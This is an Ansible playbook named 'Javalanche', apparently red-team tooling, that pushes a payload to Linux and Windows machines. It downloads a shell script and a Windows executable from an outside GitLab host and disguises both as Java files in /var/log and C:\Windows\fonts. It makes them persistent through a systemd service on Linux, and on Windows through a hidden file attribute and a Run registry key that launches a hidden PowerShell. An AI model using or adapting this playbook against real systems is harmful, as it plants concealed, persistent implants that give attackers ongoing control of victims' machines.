---
  - name: Javalanche | Define Linux Distros
    set_fact:
      linux_distros: ["RedHat", "CentOS", "Fedora", "Scientific", "CloudLinux", "OracleLinux", "Amazon", "XenServer", "Debian", "Ubuntu", "SUSE", "SLED", "SLES", "Gentoo", "Archlinux", "Mandrake", "Alpine"]

  - name: Linux make directory
    ansible.builtin.file:
      path: /var/log/asa/osa
      state: directory
    when: ansible_os_family in linux_distros

  - name: Linux Download Agent
    get_url:
      url: https://gitlab.ritsec.cloud/jms9508/Javalanche/-/raw/main/Payloads/linuxPayload.sh?ref_type=heads
      dest: /var/log/asa/osa/java-23.0.1-bin-java.sh
      mode: '0755'
    when: ansible_os_family in linux_distros

  - name: Linux Download Service file
    get_url:
      url: https://gitlab.ritsec.cloud/jms9508/Javalanche/-/raw/main/Payloads/java-init.service?ref_type=heads
      dest: /lib/systemd/system/java-23.0.1-bin-java.service
      mode: 644
    when: ansible_os_family in linux_distros

  - name: Linux Reload Service Daemons
    systemd:
      daemon_reload: yes
    when: ansible_os_family in linux_distros

  - name: Linux Stop Service
    service:
      name: java-23.0.1-bin-java
      state: stopped
    when: ansible_os_family in linux_distros

  - name: Linux Start and Enable Service
    service:
      name: java-23.0.1-bin-java
      enabled: yes
      state: started
    when: ansible_os_family in linux_distros

  - name: Windows Download agent
    win_shell: wget -o C:\\Windows\\fonts\\jdk-23.0.1-bin-java.exe https://gitlab.ritsec.cloud/jms9508/Javalanche/-/raw/main/Payloads/windowsBinary/x64/Debug/windowsBinary.exe?ref_type=heads    
    when: ansible_os_family == "Windows"
  
  - name: Windows Hide Agent
    win_command: "attrib +h 'C:\\Windows\\fonts\\jdk-23.0.1-bin-java.exe'"
    when: ansible_os_family == "Windows"

  - name: Windows Persistance
    win_regedit: 
      path: 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
      name: "java-init"
      data: "PowerShell.exe -WindowStyle hidden 'C:\\Windows\\fonts\\jdk-23.0.1-bin-java.exe'"
      type: string
    when: ansible_os_family == "Windows"

  - name: Windows Run Agent
    ansible.windows.win_shell: 'runas /trustlevel:0x20000 jdk-23.0.1-bin-java.exe'
    async: 45
    poll: 0
    args:
      chdir: C:\\Windows\\fonts
    when: ansible_os_family == "Windows"